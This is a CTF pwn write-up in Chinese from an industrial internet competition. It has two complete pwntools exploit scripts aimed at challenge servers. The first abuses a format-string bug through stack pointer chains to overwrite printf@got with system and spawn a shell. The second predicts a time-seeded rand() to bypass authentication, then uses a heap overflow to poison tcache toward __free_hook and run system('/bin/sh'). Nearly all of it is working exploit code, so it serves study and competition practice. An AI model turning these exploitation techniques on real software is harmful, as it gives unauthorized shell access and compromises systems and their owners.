

中国工业互联网大赛-pwn

究极输出

格式化字符串保存在 bss 段，栈上没有受控数据，所以要在栈上找两条指针链（先用 %N$hn 改写链上的栈地址，再借它往目标写），最终把 printf@got 改写成 system 的地址。

from pwn import *
# Target binary, the libc shipped with the challenge (used for symbol offsets),
# and the remote endpoint.
binary = "./pwn"
elf = ELF(binary)
libc = ELF('./libc.so.6')
ip = '39.105.99.40'
port = 35099

# 1 -> spawn the binary locally, 0 -> talk to the remote instance.
local = 1
io = process(binary) if local else remote(ip, port)

context.log_level = "debug"

def debug():
    """Attach gdb to the live target and block until the user resumes it."""
    gdb.attach(io)
    pause()

# Thin wrappers over the pwntools tube so the exploit body stays short.
def s(data):
    """Send raw bytes."""
    return io.send(data)


def sl(data):
    """Send bytes followed by a newline."""
    return io.sendline(data)


def sa(text, data):
    """Wait for `text`, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Wait for `text`, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently available."""
    return io.recv()


def ru(text):
    """Receive up to and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte and unpack the last 4 bytes as a little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte (the highest non-zero byte of a typical x86-64
    userland address) and unpack the last 6 bytes, zero-extended to 8, as a
    little-endian u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(data):
    """Log a named value as hex.

    `data` is the *name* of a variable in this script (e.g. 'libcbase') and is
    passed to eval(); only ever call it with literal names written in this
    file, never with anything derived from the target's output.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Hand the tube over to the user."""
    return io.interactive()


# stdout _flags value for the classic _IO_FILE leak; not referenced in this script.
_flags = 0xfbad1800


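# Stage 1: leak. '%9$p%6$p' prints two stack slots as 0x-prefixed hex; slot 9
# holds a libc pointer and slot 6 a stack pointer (offsets found with gdb for
# this binary/libc pair).
sla(b'HELLO?PWN IT!!!', b'%9$p%6$p')
ru(b'\n')
# Each %p of a 0x7f.. address is exactly 14 characters ("0x" + 12 hex digits).
# recvn() blocks until exactly that many bytes arrive; the original recv(14)
# returned *up to* 14 bytes and could split the number on a slow link, which
# then breaks int(..., 16) on the second value.
libc_leak = int(io.recvn(14), 16)
stack = int(io.recvn(14), 16)
# 0x20840 is the distance from the leaked pointer to the libc load base for the
# provided libc.so.6; it must be recomputed for any other libc build.
libcbase = libc_leak - 0x20840
lg('libcbase')
lg('stack')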


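def _pad(value, width_bits):
    """Return the '%Nc' width that makes printf's output counter equal `value`
    modulo 2**width_bits (16 for %hn, 8 for %hhn), assuming nothing has been
    printed yet in this format string.

    '%0c' still emits one character, so a zero residue is mapped to a full
    wrap (2**width_bits) instead of 0; a negative residue is folded into range.
    """
    mod = 1 << width_bits
    return (value % mod) or mod


def _fmt_write(width, spec):
    """Build b'%<width>c%<spec>': print `width` chars, then store the counter."""
    return b'%' + str(width).encode() + b'c' + spec


# Stage 2: build two pointer chains on the stack, then write system() through
# them. Each '%N$hn' stores printf's character count into the address held in
# stack argument N. The slot numbers (10/37, 25/39, 16/30) and the constants
# 0x3390/0x3392 were derived in gdb for this binary and are not recomputed
# here; per the write-up the end goal is printf@got -> system, so presumably
# the chains end up pointing at the two halves of that GOT entry -- confirm
# the slot layout in gdb before reusing.

# Chain 1: set the low 16 bits of the stack word slot 10 points at to
# stack+0xb0, then store 0x3390 through slot 37.
sla(b'HELLO?PWN IT!!!', _fmt_write(_pad(stack + 0xb0, 16), b'%10$hn'))

# Breakpoint used while developing: gdb.attach(io, 'b* 0x4011C7'); pause()
sla(b'HELLO?PWN IT!!!', _fmt_write(0x3390, b'%37$hn'))

sys_addr = libcbase + libc.sym['system']
lg('sys_addr')

# Chain 2: same trick with slots 25 and 39, target stack+0x40, value 0x3392.
sla(b'HELLO?PWN IT!!!', _fmt_write(_pad(stack + 0x40, 16), b'%25$hn'))
sla(b'HELLO?PWN IT!!!', _fmt_write(0x3392, b'%39$hn'))

# Final write: byte 2 of system() via %16$hhn, then its low 16 bits via
# %30$hn in the same format string. The second width is relative to what the
# first conversion already printed. Both widths are reduced modulo the store
# width, so this no longer yields a negative width (which printf treats as
# "left-justify", printing no padding at all) when system's low half is
# smaller than its third byte -- the original subtraction did that for some
# ASLR bases and silently wrote the wrong value.
byte2 = _pad(sys_addr >> 16, 8)
low16 = _pad((sys_addr & 0xffff) - byte2, 16)
payload = _fmt_write(byte2, b'%16$hhn') + _fmt_write(low16, b'%30$hn')
sla(b'HELLO?PWN IT!!!', payload)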

# Breakpoint used while debugging the final write: gdb.attach(io, 'b* 0x4011c7'); pause()
# Per the write-up printf@got now points to system, so the next input line is
# handed to system() as if it were the format string.
sla(b'HELLO?PWN IT!!!', b'/bin/sh')
ia()

humidCtr

HTTP 风格的 pwn：把请求格式逆出来之后，认证用的随机数可以用同一秒的 time(0) 作种子、用本机 libc 的 rand() 复现来绕过；之后是一个简单的堆溢出，改 tcache fd 指向 __free_hook 并写入 system。

from pwn import *
from ctypes import *
binary = "./pwn"
elf = ELF(binary)
# The host's libc, loaded through ctypes so srand()/rand() can be replayed
# exactly as the target computes them (pwntools' ELF object cannot run them).
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
ip = '1.14.71.254'
port = 28834

# 1 -> local process, 0 -> remote instance.
local = 1
io = process(binary) if local else remote(ip, port)

context.log_level = "debug"

def debug():
    """Attach gdb to the live target and block until the user resumes it."""
    gdb.attach(io)
    pause()

# Short aliases for the pwntools tube operations used below.
def s(data):
    """Send raw bytes."""
    return io.send(data)


def sl(data):
    """Send bytes plus a newline."""
    return io.sendline(data)


def sa(text, data):
    """Block until `text` arrives, then send `data`."""
    return io.sendafter(text, data)


def sla(text, data):
    """Block until `text` arrives, then send `data` plus a newline."""
    return io.sendlineafter(text, data)


def r():
    """Receive whatever is currently buffered."""
    return io.recv()


def ru(text):
    """Receive through and including `text`."""
    return io.recvuntil(text)


def uu32():
    """Read until a 0xff byte; unpack the trailing 4 bytes as little-endian u32."""
    return u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))


def uu64():
    """Read until a 0x7f byte (top non-zero byte of a typical x86-64 userland
    pointer); unpack the trailing 6 bytes, zero-padded to 8, as little-endian u64."""
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def lg(data):
    """Log `data` (the *name* of a script variable, e.g. 'libcbase') as hex.

    The name is eval()'d in this module's scope; pass only literal names
    written in this file, never anything taken from the target.
    """
    return io.success('%s -> 0x%x' % (data, eval(data)))


def ia():
    """Drop into interactive mode."""
    return io.interactive()


# stdout _flags constant for _IO_FILE leaks; not used by this script.
_flags = 0xfbad1800

# Every request is one HTTP-looking request line followed by a body of
# '&'-separated fields: a single opcode byte (1 add, 2 edit, 3 show, 4 delete)
# and then the arguments. Integer fields are sent as decimal text.
_REQ_HEAD = b'POST / HTTP/1.1\r\n'


def _request(op, *fields):
    """Serialize opcode `op` and its `fields` into the target's wire format."""
    parts = [p8(op)]
    for field in fields:
        parts.append(str(field).encode() if isinstance(field, int) else field)
    return _REQ_HEAD + b'&'.join(parts)


def add(idx, size, con = b'a'):
    """Allocate slot `idx` with `size` and initial content `con`.

    Sent with sendafter (no trailing newline), presumably because the content
    is consumed as-is and a newline would end up inside the chunk.
    """
    sa(b'>', _request(1, idx, size, con))


def show(idx):
    """Print the contents of slot `idx`."""
    sla(b'>', _request(3, idx))


def delete(idx):
    """Free slot `idx`."""
    sla(b'>', _request(4, idx))


def edit(idx, con):
    """Overwrite slot `idx` with `con` (no trailing newline, as in add())."""
    sa(b'>', _request(2, idx, con))

# Auth bypass: the service is assumed (per the write-up) to seed its PRNG with
# time(NULL) and check the client against rand(); replay that with the host's
# libc. This only works when both sides call time() within the same second, so
# a failed auth is usually a one-second race -- rerun. A skewed remote clock
# would need an explicit offset added to the seed. ctypes defaults the return
# type to c_int, which still holds current epoch seconds.
seed = libc.time(0)
libc.srand(seed)
result = libc.rand()

# Present the recovered PRNG output with the 'auth' verb to pass the check.
sla(b'>', b'DEV / HTTP/1.1\r\n' + p32(result) + b'auth')
sleep(1)

# Leak: allocate one chunk with the default 1-byte content b'a' and print it.
add(0, 0x30)
sleep(1)
show(0)
sleep(1)
# Judging by the constant, the chunk still holds a libc pointer (main_arena+96
# is 0x1ecbe0 on a 2.31-era Ubuntu glibc) whose low byte was replaced by the
# b'a' (0x61) just written, hence 0x1ecb61. All three offsets are specific to
# the remote's glibc build and must be recomputed for any other libc.
libcbase = uu64() - 0x1ecb61
free_hook = libcbase + 0x1eee48
sys_addr = libcbase + 0x52290
lg('libcbase')

# Heap stage: tcache poisoning. Chunks 1 and 2 are freed so chunk 1 sits at
# the head of its tcache bin, then the overflow from chunk 0 rewrites chunk
# 1's fd (tcache next pointer) to __free_hook. The 0x20 bytes of filler are
# what reach that field with this binary's allocation layout -- verify in gdb
# if the sizes change.
for index in (1, 2):
    add(index, 0x30)
    sleep(1)
delete(2)
sleep(1)
delete(1)
sleep(1)
edit(0, b'a' * 0x20 + p64(free_hook))
sleep(1)
# The first allocation hands back chunk 1; the second hands back __free_hook
# itself, into which system's address is written. free(2) then runs
# system("/bin/sh").
add(2, 0x30, b'/bin/sh\x00')
sleep(1)
add(3, 0x30, p64(sys_addr))
sleep(1)
delete(2)
# NOTE(review): this relies on a raw, unmangled fd write and on __free_hook
# existing, i.e. glibc < 2.32 (no safe-linking) and < 2.34 (hook removed);
# the hard-coded offsets above already pin the script to one such build.
ia()